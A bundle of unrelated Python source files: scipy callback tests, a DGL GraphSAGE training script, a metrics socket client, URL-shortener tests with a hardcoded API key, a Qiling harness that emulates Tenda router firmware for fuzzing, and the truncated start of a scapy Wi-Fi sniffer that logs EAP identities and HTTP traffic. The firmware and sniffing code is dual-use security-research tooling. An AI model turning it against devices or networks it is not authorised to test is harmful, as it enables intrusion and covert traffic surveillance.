            func2 = lambda x: func(x, 2.0)
        else:
            func2 = LowLevelCallable(func, user_data)
            func = LowLevelCallable(func)

        # Test that basic call fails
        assert_raises(ValueError, caller, LowLevelCallable(func), 1.0)

        # Test that passing in user_data also fails
        assert_raises(ValueError, caller, func2, 1.0)

        # Test error message
        llfunc = LowLevelCallable(func)
        try:
            caller(llfunc, 1.0)
        except ValueError as err:
            msg = str(err)
            # Message must mention both the offered and an expected signature.
            assert_(llfunc.signature in msg, msg)
            assert_('double (double, double, int *, void *)' in msg, msg)

    for caller in sorted(CALLERS.keys()):
        for func in sorted(BAD_FUNCS.keys()):
            for user_data in sorted(USER_DATAS.keys()):
                yield check, caller, func, user_data


def test_signature_override():
    """An explicit signature= overrides the capsule's own signature string."""
    caller = _test_ccallback.test_call_simple
    func = _test_ccallback.test_get_plus1_capsule()

    # A bogus signature is stored verbatim but rejected at call time.
    llcallable = LowLevelCallable(func, signature="bad signature")
    assert_equal(llcallable.signature, "bad signature")
    assert_raises(ValueError, caller, llcallable, 3)

    llcallable = LowLevelCallable(func, signature="double (double, int *, void *)")
    assert_equal(llcallable.signature, "double (double, int *, void *)")
    assert_equal(caller(llcallable, 3), 4)


def test_threadsafety():
    """Re-entrant callbacks invoked concurrently from 20 threads stay correct."""
    def callback(a, caller):
        # Recursive callback: re-enters the C caller until a reaches 0,
        # so the final result is 2**count.
        if a <= 0:
            return 1
        else:
            res = caller(lambda x: callback(x, caller), a - 1)
            return 2*res

    def check(caller):
        caller = CALLERS[caller]

        results = []

        count = 10

        def run():
            time.sleep(0.01)
            r = caller(lambda x: callback(x, caller), count)
            results.append(r)

        threads = [threading.Thread(target=run) for j in range(20)]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()

        assert_equal(results, [2.0**count]*len(threads))

    for caller in CALLERS.keys():
        yield check, caller
train_sampling_unsupervised.py
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.multiprocessing as mp
import dgl.function as fn
import dgl.nn.pytorch as dglnn
import time
import argparse
from dgl.data import RedditDataset
from torch.nn.parallel import DistributedDataParallel
import tqdm
import sklearn.linear_model as lm
import sklearn.metrics as skm

from utils import thread_wrapped_func

class NegativeSampler(object):
    """Draws negative destination nodes with probability ∝ in_degree**0.75."""
    def __init__(self, g, k, neg_share=False):
        # Unnormalized sampling weights per node (word2vec-style 3/4 power).
        self.weights = g.in_degrees().float() ** 0.75
        self.k = k                    # negatives per positive edge
        self.neg_share = neg_share    # reuse one negative batch across k positives

    def __call__(self, g, eids):
        """Return (src, dst) node ID tensors for len(eids)*k negative pairs."""
        src, _ = g.find_edges(eids)
        n = len(src)
        if self.neg_share and n % self.k == 0:
            # Sample n negatives and share each group of k among k sources.
            dst = self.weights.multinomial(n, replacement=True)
            dst = dst.view(-1, 1, self.k).expand(-1, self.k, -1).flatten()
        else:
            dst = self.weights.multinomial(n*self.k, replacement=True)
        src = src.repeat_interleave(self.k)
        return src, dst

class SAGE(nn.Module):
    """Multi-layer GraphSAGE encoder with mean aggregation."""
    def __init__(self, in_feats, n_hidden, n_classes, n_layers, activation, dropout):
        super().__init__()
        self.n_layers = n_layers
        self.n_hidden = n_hidden
        self.n_classes = n_classes
        self.layers = nn.ModuleList()
        # in_feats -> n_hidden -> ... -> n_classes (n_layers SAGEConv layers).
        self.layers.append(dglnn.SAGEConv(in_feats, n_hidden, 'mean'))
        for i in range(1, n_layers - 1):
            self.layers.append(dglnn.SAGEConv(n_hidden, n_hidden, 'mean'))
        self.layers.append(dglnn.SAGEConv(n_hidden, n_classes, 'mean'))
        self.dropout = nn.Dropout(dropout)
        self.activation = activation

    def forward(self, blocks, x):
        """Minibatch forward over a list of sampled blocks (one per layer)."""
        h = x
        for l, (layer, block) in enumerate(zip(self.layers, blocks)):
            h = layer(block, h)
            # No activation/dropout after the final layer.
            if l != len(self.layers) - 1:
                h = self.activation(h)
                h = self.dropout(h)
        return h

    def inference(self, g, x, device):
        """
        Inference with the GraphSAGE model on full neighbors (i.e. without neighbor sampling).
        g : the entire graph.
        x : the input of entire node set.
        The inference code is written in a fashion that it could handle any number of nodes and
        layers.
        """
        # During inference with sampling, multi-layer blocks are very inefficient because
        # lots of computations in the first few layers are repeated.
        # Therefore, we compute the representation of all nodes layer by layer.  The nodes
        # on each layer are of course splitted in batches.
        # TODO: can we standardize this?
        # NOTE(review): this method reads the module-level `args` (batch_size,
        # num_workers) defined in the __main__ block — confirm it is only
        # called when the script runs as a program.
        for l, layer in enumerate(self.layers):
            # Output buffer for this layer's representation of ALL nodes.
            y = th.zeros(g.num_nodes(), self.n_hidden if l != len(self.layers) - 1 else self.n_classes)

            # 1-hop full-neighbor blocks: one layer at a time over the graph.
            sampler = dgl.dataloading.MultiLayerFullNeighborSampler(1)
            dataloader = dgl.dataloading.NodeDataLoader(
                g,
                th.arange(g.num_nodes()),
                sampler,
                batch_size=args.batch_size,
                shuffle=True,
                drop_last=False,
                num_workers=args.num_workers)

            for input_nodes, output_nodes, blocks in tqdm.tqdm(dataloader):
                block = blocks[0].to(device)

                h = x[input_nodes].to(device)
                h = layer(block, h)
                if l != len(self.layers) - 1:
                    h = self.activation(h)
                    h = self.dropout(h)

                y[output_nodes] = h.cpu()

            # This layer's output becomes the next layer's input.
            x = y
        return y

class CrossEntropyLoss(nn.Module):
    """Binary cross-entropy link-prediction loss over dot-product edge scores."""
    def forward(self, block_outputs, pos_graph, neg_graph):
        # Score each edge as the dot product of its endpoint embeddings.
        with pos_graph.local_scope():
            pos_graph.ndata['h'] = block_outputs
            pos_graph.apply_edges(fn.u_dot_v('h', 'h', 'score'))
            pos_score = pos_graph.edata['score']
        with neg_graph.local_scope():
            neg_graph.ndata['h'] = block_outputs
            neg_graph.apply_edges(fn.u_dot_v('h', 'h', 'score'))
            neg_score = neg_graph.edata['score']

        # Positive edges labeled 1, negative edges labeled 0.
        score = th.cat([pos_score, neg_score])
        label = th.cat([th.ones_like(pos_score), th.zeros_like(neg_score)]).long()
        loss = F.binary_cross_entropy_with_logits(score, label.float())
        return loss

def compute_acc(emb, labels, train_nids, val_nids, test_nids):
    """
    Compute the accuracy of prediction given the labels.

    Fits a logistic-regression probe on the (standardized) embeddings of the
    training nodes and returns (val_f1_micro, test_f1_micro).
    """
    emb = emb.cpu().numpy()
    labels = labels.cpu().numpy()
    train_nids = train_nids.cpu().numpy()
    train_labels = labels[train_nids]
    val_nids = val_nids.cpu().numpy()
    val_labels = labels[val_nids]
    test_nids = test_nids.cpu().numpy()
    test_labels = labels[test_nids]

    # Standardize features per dimension before fitting the probe.
    emb = (emb - emb.mean(0, keepdims=True)) / emb.std(0, keepdims=True)

    lr = lm.LogisticRegression(multi_class='multinomial', max_iter=10000)
    lr.fit(emb[train_nids], train_labels)

    pred = lr.predict(emb)
    f1_micro_eval = skm.f1_score(val_labels, pred[val_nids], average='micro')
    f1_micro_test = skm.f1_score(test_labels, pred[test_nids], average='micro')
    return f1_micro_eval, f1_micro_test

def evaluate(model, g, nfeat, labels, train_nids, val_nids, test_nids, device):
    """
    Evaluate the model on the validation set specified by ``val_mask``.
    g : The entire graph.
    inputs : The features of all the nodes.
    labels : The labels of all the nodes.
    val_mask : A 0-1 mask indicating which nodes do we actually compute the accuracy for.
    device : The GPU device to evaluate on.
    """
    model.eval()
    with th.no_grad():
        # single gpu
        if isinstance(model, SAGE):
            pred = model.inference(g, nfeat, device)
        # multi gpu: unwrap DistributedDataParallel
        else:
            pred = model.module.inference(g, nfeat, device)
    model.train()
    return compute_acc(pred, labels, train_nids, val_nids, test_nids)

#### Entry point
def run(proc_id, n_gpus, args, devices, data):
    """Per-process training loop (one process per GPU, or one CPU process)."""
    # Unpack data
    device = devices[proc_id]
    if n_gpus > 1:
        # Initialize NCCL process group for multi-GPU training.
        dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
            master_ip='127.0.0.1', master_port='12345')
        world_size = n_gpus
        th.distributed.init_process_group(backend="nccl",
                                          init_method=dist_init_method,
                                          world_size=world_size,
                                          rank=proc_id)
    train_mask, val_mask, test_mask, n_classes, g = data
    nfeat = g.ndata.pop('feat')
    labels = g.ndata.pop('label')
    in_feats = nfeat.shape[1]

    train_nid = th.LongTensor(np.nonzero(train_mask)).squeeze()
    val_nid = th.LongTensor(np.nonzero(val_mask)).squeeze()
    test_nid = th.LongTensor(np.nonzero(test_mask)).squeeze()

    # Create PyTorch DataLoader for constructing blocks
    n_edges = g.num_edges()
    train_seeds = np.arange(n_edges)
    if n_gpus > 0:
        # Shard the edge IDs evenly across GPUs; the last shard may be shorter.
        num_per_gpu = (train_seeds.shape[0] + n_gpus -1) // n_gpus
        train_seeds = train_seeds[proc_id * num_per_gpu :
                                  (proc_id + 1) * num_per_gpu \
                                  if (proc_id + 1) * num_per_gpu < train_seeds.shape[0]
                                  else train_seeds.shape[0]]

    # Create sampler
    sampler = dgl.dataloading.MultiLayerNeighborSampler(
        [int(fanout) for fanout in args.fan_out.split(',')])
    dataloader = dgl.dataloading.EdgeDataLoader(
        g, train_seeds, sampler, exclude='reverse_id',
        # For each edge with ID e in Reddit dataset, the reverse edge is e ± |E|/2.
        reverse_eids=th.cat([
            th.arange(n_edges // 2, n_edges),
            th.arange(0, n_edges // 2)]),
        negative_sampler=NegativeSampler(g, args.num_negs),
        batch_size=args.batch_size,
        shuffle=True,
        drop_last=False,
        pin_memory=True,
        num_workers=args.num_workers)

    # Define model and optimizer
    # Output size equals num_hidden (embeddings, not class logits) because
    # training is unsupervised; classification happens in compute_acc's probe.
    model = SAGE(in_feats, args.num_hidden, args.num_hidden, args.num_layers, F.relu, args.dropout)
    model = model.to(device)
    if n_gpus > 1:
        model = DistributedDataParallel(model, device_ids=[device], output_device=device)
    loss_fcn = CrossEntropyLoss()
    optimizer = optim.Adam(model.parameters(), lr=args.lr)

    # Training loop
    avg = 0
    iter_pos = []   # positive-edge throughput per step
    iter_neg = []   # negative-edge throughput per step
    iter_d = []     # data-loading time per step
    iter_t = []     # compute time per step
    best_eval_acc = 0
    best_test_acc = 0
    for epoch in range(args.num_epochs):
        tic = time.time()

        # Loop over the dataloader to sample the computation dependency graph as a list of
        # blocks.
        tic_step = time.time()
        for step, (input_nodes, pos_graph, neg_graph, blocks) in enumerate(dataloader):
            batch_inputs = nfeat[input_nodes].to(device)
            d_step = time.time()

            pos_graph = pos_graph.to(device)
            neg_graph = neg_graph.to(device)
            blocks = [block.int().to(device) for block in blocks]
            # Compute loss and prediction
            batch_pred = model(blocks, batch_inputs)
            loss = loss_fcn(batch_pred, pos_graph, neg_graph)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()

            t = time.time()
            pos_edges = pos_graph.num_edges()
            neg_edges = neg_graph.num_edges()
            iter_pos.append(pos_edges / (t - tic_step))
            iter_neg.append(neg_edges / (t - tic_step))
            iter_d.append(d_step - tic_step)
            iter_t.append(t - d_step)
            if step % args.log_every == 0:
                gpu_mem_alloc = th.cuda.max_memory_allocated() / 1000000 if th.cuda.is_available() else 0
                # Skip the first 3 steps when averaging to ignore warm-up noise.
                print('[{}]Epoch {:05d} | Step {:05d} | Loss {:.4f} | Speed (samples/sec) {:.4f}|{:.4f} | Load {:.4f}| train {:.4f} | GPU {:.1f} MB'.format(
                    proc_id, epoch, step, loss.item(), np.mean(iter_pos[3:]), np.mean(iter_neg[3:]), np.mean(iter_d[3:]), np.mean(iter_t[3:]), gpu_mem_alloc))
            tic_step = time.time()

            # Periodic evaluation on rank 0 only.
            if step % args.eval_every == 0 and proc_id == 0:
                eval_acc, test_acc = evaluate(model, g, nfeat, labels, train_nid, val_nid, test_nid, device)
                print('Eval Acc {:.4f} Test Acc {:.4f}'.format(eval_acc, test_acc))
                if eval_acc > best_eval_acc:
                    best_eval_acc = eval_acc
                    best_test_acc = test_acc
                print('Best Eval Acc {:.4f} Test Acc {:.4f}'.format(best_eval_acc, best_test_acc))

        toc = time.time()
        if proc_id == 0:
            print('Epoch Time(s): {:.4f}'.format(toc - tic))
        # Average epoch time over epochs >= 5 (skip warm-up epochs).
        if epoch >= 5:
            avg += toc - tic
        if n_gpus > 1:
            th.distributed.barrier()

    if proc_id == 0:
        print('Avg epoch time: {}'.format(avg / (epoch - 4)))

def main(args, devices):
    """Load Reddit, pack the data tuple, and launch one run() per device."""
    # load reddit data
    data = RedditDataset(self_loop=False)
    n_classes = data.num_classes
    g = data[0]
    train_mask = g.ndata['train_mask']
    val_mask = g.ndata['val_mask']
    test_mask = g.ndata['test_mask']
    # Create csr/coo/csc formats before launching training processes with multi-gpu.
    # This avoids creating certain formats in each sub-process, which saves momory and CPU.
    g.create_formats_()
    # Pack data
    data = train_mask, val_mask, test_mask, n_classes, g

    n_gpus = len(devices)
    if devices[0] == -1:
        # CPU-only run.
        run(0, 0, args, ['cpu'], data)
    elif n_gpus == 1:
        run(0, n_gpus, args, devices, data)
    else:
        # One training process per GPU.
        procs = []
        for proc_id in range(n_gpus):
            p = mp.Process(target=thread_wrapped_func(run),
                           args=(proc_id, n_gpus, args, devices, data))
            p.start()
            procs.append(p)
        for p in procs:
            p.join()

if __name__ == '__main__':
    argparser = argparse.ArgumentParser("multi-gpu training")
    argparser.add_argument("--gpu", type=str, default='0',
                           help="GPU, can be a list of gpus for multi-gpu trianing,"
                                " e.g., 0,1,2,3; -1 for CPU")
    argparser.add_argument('--num-epochs', type=int, default=20)
    argparser.add_argument('--num-hidden', type=int, default=16)
    argparser.add_argument('--num-layers', type=int, default=2)
    argparser.add_argument('--num-negs', type=int, default=1)
    argparser.add_argument('--neg-share', default=False, action='store_true',
                           help="sharing neg nodes for positive nodes")
    argparser.add_argument('--fan-out', type=str, default='10,25')
    argparser.add_argument('--batch-size', type=int, default=10000)
    argparser.add_argument('--log-every', type=int, default=20)
    argparser.add_argument('--eval-every', type=int, default=1000)
    argparser.add_argument('--lr', type=float, default=0.003)
    argparser.add_argument('--dropout', type=float, default=0.5)
    argparser.add_argument('--num-workers', type=int, default=0,
                           help="Number of sampling processes. Use 0 for no extra process.")
    args = argparser.parse_args()

    devices = list(map(int, args.gpu.split(',')))

    main(args, devices)
client.py
#!/usr/bin/python
# -*- coding: utf-8 -*-

'''
Description: Tirion client
'''

import numpy
import os
import socket
import sys
import threading

from __init__ import __version__


class Client:
    """Tirion client.

    Connects to the Tirion agent over a unix domain socket, negotiates a
    shared-memory (numpy memmap) metric file, and exposes thread-safe
    get/set/add operations on the metric slots plus tagging and logging.
    """

    __LOG_PREFIX = "[client]"        # prefix for all log output
    __TIRION_BUFFER_SIZE = 4096      # max bytes read per socket recv
    __TIRION_TAG_SIZE = 513          # max length of a tag sent to the agent

    def __init__(self, socket_filename, verbose):
        """Tirion client constructor

        @param socket_filename the socket filepath to connect to the agent
        @param verbose enable or disable verbose output of the client library
        """
        self.__command_thread = None   # background thread running __handle_commands
        self.__count = 0               # number of metric slots, sent by the agent
        self.__metrics = None          # numpy memmap of float32 metric values
        self.__metric_lock = None      # guards __metrics across threads
        self.__net = None              # unix socket to the agent
        self.__running = False
        self.__socket = socket_filename
        self.__verbose_output = verbose

    def init(self):
        """Initialize a Tirion client object.

        Performs the handshake with the agent: sends the protocol version,
        receives the metric count and mmap filename, maps the metric file,
        and starts the command-handling thread.

        @raise RuntimeError on socket failure or a malformed handshake reply
        """
        os.setsid()

        self.verbose("Open unix socket to {}", self.__socket)

        self.__net = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

        try:
            self.__net.connect(self.__socket)
        except socket.error as err:
            raise RuntimeError("Cannot initialize socket: " + str(err))

        self.verbose("Request tirion protocol version v{}", __version__)
        self.__send("tirion v" + __version__ + "\tmmap")

        # Reply format: "<metric count>\tmmap://<filename>" (tab separated).
        header = self.__receive().split("\t")

        if len(header) < 2 or len(header[1]) == 0:
            raise RuntimeError("Did not receive correct metric count and mmap filename")

        try:
            self.__count = int(header[0])
        except ValueError:
            self.error("Did not receive correct metric count")
            raise RuntimeError("Metric count is not a number")

        self.__metric_lock = threading.Lock()

        if not header[1].startswith("mmap://"):
            raise RuntimeError("Did not receive correct mmap filename")

        # Strip the "mmap://" scheme prefix (7 characters).
        mmap_filename = header[1][7:]

        self.verbose("Received metric count {} and mmap filename {}", self.__count, mmap_filename)

        self.__metrics = numpy.memmap(mmap_filename, dtype='float32', mode='r+', shape=(self.__count,))

        self.verbose("Initialized metric collector mmap")

        self.__running = True

        # we want to handle commands not in the main thread
        self.__command_thread = threading.Thread(target=Client.__handle_commands, args=(self,))
        self.__command_thread.start()

    def close(self):
        """Uninitialized a Tirion client object"""
        self.__running = False

        if self.__metric_lock is not None:
            self.__metric_lock.acquire()

        if self.__metrics is not None:
            # self.__metrics.close()
            self.__metrics = None

        if self.__net is not None:
            # Shutting down the socket unblocks the command thread's recv.
            self.__net.shutdown(socket.SHUT_RDWR)
            self.__net.close()
            self.__net = None

        if self.__command_thread is not None:
            self.__command_thread.join()
            self.__command_thread = None

        if self.__metric_lock is not None:
            self.__metric_lock.release()

    def destroy(self):
        """Cleanup everything that was allocated by the Tirion client object"""
        self.__metric_lock = None

    def get(self, index):
        """Return the current value of a metric

        @param index the index of the metric
        @return the value of the metric
        """
        # Out-of-range or uninitialized clients report 0.0 instead of raising.
        if index < 0 or index >= self.__count or self.__metric_lock is None or self.__metrics is None:
            return 0.0

        return self.__metrics[index]

    def set(self, index, value):
        """Set a value for a metric

        @param index the index of the metric
        @param value the value to be set to the metric
        @return the new value of the metric
        """
        if index < 0 or index >= self.__count or self.__metric_lock is None:
            return 0.0

        ret = 0.0

        self.__metric_lock.acquire()

        if self.__metrics is not None:
            ret = value

            self.__metrics[index] = ret

        self.__metric_lock.release()

        return ret

    def add(self, index, value):
        """Add a value to a metric

        @param index the index of the metric
        @param value the value to be add to the metric
        @return the new value of the metric
        """
        if index < 0 or index >= self.__count or self.__metric_lock is None:
            return 0.0

        ret = 0.0

        self.__metric_lock.acquire()

        if self.__metrics is not None:
            ret = self.__metrics[index] + value

            self.__metrics[index] = ret

        self.__metric_lock.release()

        return ret

    def dec(self, index):
        """Decrement a metric by 1.0

        @param index the index of the metric
        @return the new value of the metric
        """
        return self.add(index, -1.0)

    def inc(self, index):
        """Increment a metric by 1.0

        @param index the index of the metric
        @return the new value of the metric
        """
        return self.add(index, 1.0)

    def sub(self, index, value):
        """Subtract a value of a metric

        @param index the index of the metric
        @param value the value to be subtracted of the metric
        @return the new value of the metric
        """
        return self.add(index, -value)

    def running(self):
        """States if the Tirion Client object is running

        @return running state
        """
        return self.__running

    def tag(self, format_string, *args):
        """Send a tag to the agent

        @param format_string the tag string that follows the same specifications as format_string in string.format
        @param args additional arguments for format_string
        """
        # Tags are prefixed with the protocol opcode "t".
        self.__send(self.__prepare_tag("t" + format_string.format(*args)))

    def __message(self, message_type, format_string, *args):
        """Output a Tirion message"""
        if not self.__verbose_output:
            return

        sys.stderr.write(Client.__LOG_PREFIX + "[" + message_type + "] " + format_string.format(*args) + "\n")

    def debug(self, format_string, *args):
        """Output a Tirion debug message

        @param format_string the message string that follows the same specifications as format_string in string.format
        @param args additional arguments for format_string
        """
        self.__message("debug", format_string, *args)

    def error(self, format_string, *args):
        """Output a Tirion error message

        @param format_string the message string that follows the same specifications as format_string in string.format
        @param args additional arguments for format_string
        """
        self.__message("error", format_string, *args)

    def verbose(self, format_string, *args):
        """Output a Tirion verbose message

        @param format_string the message string that follows the same specifications as format_string in string.format
        @param args additional arguments for format_string
        """
        self.__message("verbose", format_string, *args)

    def __prepare_tag(self, tag):
        """Prepare a tag string for sending: truncate and strip newlines."""
        if len(tag) > self.__TIRION_TAG_SIZE:
            tag = tag[:self.__TIRION_TAG_SIZE]

        # Newlines would break the line-oriented protocol.
        return tag.replace("\n", " ")

    def __receive(self):
        """Receive a message over the unix socket"""
        msg = self.__net.recv(self.__TIRION_BUFFER_SIZE)

        # NOTE(review): on Python 3 recv returns bytes, so `msg == ''` can
        # never be true — this broken-connection check only works on
        # Python 2; confirm the target interpreter.
        if msg == '':
            raise RuntimeError("socket connection broken")

        return msg.strip()

    def __send(self, msg):
        """Sent a message over the unix socket"""
        msg_len = len(msg)
        total = 0

        # Loop because send() may transmit only part of the buffer.
        while total < msg_len:
            sent = self.__net.send(msg[total:])

            if sent == 0:
                raise RuntimeError("socket connection broken")

            total = total + sent

    def __handle_commands(self):
        """Handle commands received from the agent (runs on its own thread)."""
        self.verbose("Start listening to commands")

        while self.__running:
            try:
                rec = self.__receive()

                # First character is the command opcode; none are implemented yet.
                com = rec[0]

                self.error("Unknown command '{}'", com)
            except RuntimeError as err:
                self.error("Unix socket error: {}", err)

                self.__running = False

        self.verbose("Stop listening to commands")
test_tinyurl_link.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""Tests for lnk.tinyurl.link against the live tiny-url.info API."""

import ecstasy
import pyperclip
import pytest
import requests
import threading

from collections import namedtuple

import tests.paths

import lnk.tinyurl.link


def shorten(url):
    """Shorten *url* via the tiny-url.info API and return the short URL.

    Used as an independent oracle for what lnk's own shortener should produce.
    """
    response = requests.get('http://tiny-url.info/api/v1/create',
                            params=dict(apikey='0BFA4A7B5BDD5BE7780C',
                                        format='json',
                                        provider='tinyurl_com',
                                        url=url))
    data = response.json()

    return data['shorturl']


@pytest.fixture(scope='module')
def fixture():
    """Module-scoped fixture bundling a Link instance and reference URLs."""
    Fixture = namedtuple('Fixture', ['link', 'long', 'short', 'formatted'])

    link = lnk.tinyurl.link.Link(raw=True)
    url = 'https://www.github.com/goldsborough/lnk'
    short = shorten(url)
    formatted = ecstasy.beautify('<{0}>'.format(short), ecstasy.Style.Bold)

    return Fixture(link, url, short, formatted)


def test_copy_copies_to_clipboard_if_copy_true(fixture):
    fixture.link.copy(True, fixture.short)

    assert pyperclip.paste() == fixture.short


def test_copy_copies_only_first_url(fixture):
    # The previous test already copied a URL, so further copies are ignored.
    assert fixture.link.already_copied
    fixture.link.copy(True, 'a')
    fixture.link.copy(True, 'b')
    fixture.link.copy(True, 'c')

    assert pyperclip.paste() == fixture.short


def test_copy_copies_to_clipboard_if_copy_false(fixture):
    # With copy=False the clipboard must be left untouched.
    pyperclip.copy('original')
    fixture.link.copy(False, fixture.short)

    assert pyperclip.paste() == 'original'


def test_copy_makes_copied_url_bold(fixture):
    fixture.link.already_copied = False
    returned_url = fixture.link.copy(True, fixture.short)

    assert returned_url == fixture.formatted


def test_request_shortens_well(fixture):
    result = fixture.link.request(fixture.long)

    assert result == fixture.short


def test_shorten_formats_well(fixture):
    result = []
    fixture.link.shorten(result, False, True, True, fixture.long)
    expected = '{0} => {1}'.format(fixture.long, fixture.short)

    assert result[0] == expected


def test_shorten_warns_about_url_without_protocol(fixture, capsys):
    fixture.link.shorten([], False, False, False, 'google.com')
    out = capsys.readouterr()

    assert out
    assert out[0].startswith("\aWarning: Prepending 'http://' to")


def test_fetch_works_for_single_url(fixture):
    result = fixture.link.fetch(False, True, [fixture.long], False)

    assert result == [fixture.short]


def test_fetch_works_for_many_urls(fixture):
    urls = ['http://facebook.com', 'http://google.com', 'http://python.org']
    result = set(fixture.link.fetch(False, True, urls, False))

    # Compute the expected short URLs concurrently via the oracle API.
    expected = set()
    threads = []
    for url in urls:
        thread = threading.Thread(target=lambda u: expected.add(shorten(u)),
                                  args=(url,))
        thread.daemon = True
        thread.start()
        threads.append(thread)
    for thread in threads:
        thread.join(timeout=10)

    assert result == expected


def test_fetch_correct_output_if_raw_false_pretty_false(fixture):
    fixture.link.raw = False
    urls = [fixture.long, 'http://python.org']
    result = fixture.link.fetch(False, True, urls, False)
    expected = '\n'.join([fixture.short, shorten(urls[1])])

    # BUG FIX: this previously used `return result == expected`, whose value
    # pytest ignores — the test could never fail. It must assert.
    assert result == expected
saver_tendaac15_httpd.py
#!/usr/bin/env python3 # # Cross Platform and Multi Architecture Advanced Binary Emulation Framework # # 1. Download AC15 Firmware from https://down.tenda.com.cn/uploadfile/AC15/US_AC15V1.0BR_V15.03.05.19_multi_TD01.zip # 2. unzip # 3. binwalk -e US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin # 4. locate squashfs-root # 5. rm -rf webroot && mv webroot_ro webroot # # notes: we are using rootfs in this example, so rootfs = squashfs-root # import ctypes, os, pickle, socket, sys, threading sys.path.append("..") from qiling import * from qiling.const import QL_VERBOSE def nvram_listener(): server_address = 'rootfs/var/cfm_socket' data = "" try: os.unlink(server_address) except OSError: if os.path.exists(server_address): raise # Create UDS socket sock = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM) sock.bind(server_address) sock.listen(1) while True: connection, client_address = sock.accept() try: while True: data += str(connection.recv(1024)) if "lan.webiplansslen" in data: connection.send('192.168.170.169'.encode()) else: break data = "" finally: connection.close() def save_context(ql, *args, **kw): ql.save(cpu_context=False, snapshot="snapshot.bin") def patcher(ql): br0_addr = ql.mem.search("br0".encode() + b'\x00') for addr in br0_addr: ql.mem.write(addr, b'lo\x00') def check_pc(ql): print("=" * 50) print("Hit fuzz point, stop at PC = 0x%x" % ql.reg.arch_pc) print("=" * 50) ql.emu_stop() def my_sandbox(path, rootfs): ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DEBUG) ql.add_fs_mapper("/dev/urandom","/dev/urandom") ql.hook_address(save_context ,0x10930) ql.hook_address(patcher, ql.loader.elf_entry) ql.hook_address(check_pc,0x7a0cc) ql.run() if __name__ == "__main__": nvram_listener_therad = threading.Thread(target=nvram_listener, daemon=True) nvram_listener_therad.start() my_sandbox(["rootfs/bin/httpd"], "rootfs")
vifi.py
#!/usr/bin/env python3 import logging import os.path import re import time from multiprocessing import Process, JoinableQueue, cpu_count from sys import argv from os import nice import pdb from py2neo import remote from py2neo.database import Graph, Node, Relationship from scapy.all import * from scapy_http.http import * graph = None def get_connection(connection_type, from_node_name, to_node_name): for _ in ['', '\0', '00:00:00:00:00:00', 'ff:ff:ff:ff:ff:ff']: if _ in [from_node_name, to_node_name]: return for name in [from_node_name, to_node_name]: if re.search(r'([0-9a-f]{2}[:]){5}([0-9a-f]{2})', name) and (name.lower()[1] in ['2', '6', 'a', 'e'] or name.startswith('33:33:')): return from_node = None to_node = None if connection_type in ['WIFI/MGMT/BEACON', 'WIFI/MGMT/PROBE_REQUEST', 'WIFI/MGMT/PROBE_RESPONSE/MAC_SENT_SSID']: from_node = Node('device', mac_address=from_node_name) to_node = Node('network', essid=to_node_name) elif connection_type in ['WIFI/MGMT/PROBE_RESPONSE/MAC_RECV_SSID']: from_node = Node('network', essid=from_node_name) to_node = Node('device', mac_address=to_node_name) elif connection_type in ['WIFI/CTRL/ACK', 'ETHER/GEN/MAC_TO_MAC', 'EAP/IDENTITY/SENT_RESPONSE', 'EAP/IDENTITY/SENT_REQUEST']: from_node = Node('device', mac_address=from_node_name) to_node = Node('device', mac_address=to_node_name) elif connection_type in ['EAP/IDENTITY/RESPONSE']: from_node = Node('device', mac_address=from_node_name) to_node = Node('identity', identity=to_node_name) elif connection_type in ['EAP/IDENTITY/RECV_RESPONSE']: from_node = Node('identity', identity=from_node_name) to_node = Node('device', mac_address=to_node_name) elif connection_type in ['ARP/IS_AT', 'ARP/WHO_HAS', 'DHCP/ACK/ROUTER', 'DHCP/ACK/NAME_SERVER', 'DHCP/OFFER/ROUTER', 'DHCP/OFFER/NAME_SERVER', 'BOOTP/YIADDR', 'ETHER/IP/TRANSMITS_IP', 'ETHER/IP/RECEIVES_IP']: from_node = Node('device', mac_address=from_node_name) to_node = Node('ip', ip_address=to_node_name) elif connection_type in 
['DHCP/DISCOVER/HOSTNAME', 'DHCP/ACK/DOMAIN', 'DHCP/OFFER/DOMAIN']:
        # NOTE(review): this chunk begins mid-way through get_connection();
        # the `elif connection_type in` that owns the list literal above is
        # outside this view. Each branch maps a (type, from, to) triple onto
        # typed py2neo Node objects for the graph.
        from_node = Node('device', mac_address=from_node_name)
        to_node = Node('hostname', hostname=to_node_name)
    elif connection_type in ['IP/PORT']:
        from_node = Node('ip', ip_address=from_node_name)
        to_node = Node('ip_port', port_name=to_node_name)
    elif connection_type in ['IP/PORT/TRAFFIC']:
        from_node = Node('ip_port', port_name=from_node_name)
        to_node = Node('ip_port', port_name=to_node_name)
    elif connection_type in ['IP/TRAFFIC']:
        from_node = Node('ip', ip_address=from_node_name)
        to_node = Node('ip', ip_address=to_node_name)
    elif connection_type in ['HTTP/REQUEST/HOST', 'HTTP/RESPONSE/HOST']:
        from_node = Node('ip', ip_address=from_node_name)
        to_node = Node('hostname', hostname=to_node_name)
    elif connection_type in ['HTTP/REQUEST/USER_AGENT']:
        from_node = Node('ip', ip_address=from_node_name)
        to_node = Node('useragent', ua_string=to_node_name)
    elif connection_type in ['HTTP/REQUEST/PATH_REQUESTED']:
        from_node = Node('ip', ip_address=from_node_name)
        to_node = Node('resource', uri=to_node_name)
    if from_node is None or to_node is None:
        # Unmapped connection type: dump everything we know, then fail loudly.
        logger.debug('connection_type', connection_type, 'from_node_name', from_node_name, 'from_node', from_node, 'to_node_name', to_node_name, 'to_node', to_node)
        raise Exception('Unknown connection type {}'.format(connection_type))
    rel = Relationship(from_node, connection_type, to_node)
    return rel


def register_connection(connection):
    """Merge a Relationship into the graph; refuses a None connection."""
    if connection is None:
        raise Exception()
    graph.merge(connection)


def pktInfoDecodeable(pkt):
    """Return True if pkt.info can be decoded to text, False otherwise."""
    try:
        pkt.info.decode()
        return True
    except:
        # NOTE(review): bare except — also swallows KeyboardInterrupt etc.
        return False


def do_dpi(pkt):
    """Deep-packet-inspect one frame and return a list of
    (connection_type, from_name, to_name) triples describing what was seen
    (EAP identities, IP/port traffic, DHCP options, HTTP headers, ARP).
    """
    connections = []
    if pkt.haslayer(EAP):
        eap = pkt.getlayer(EAP)
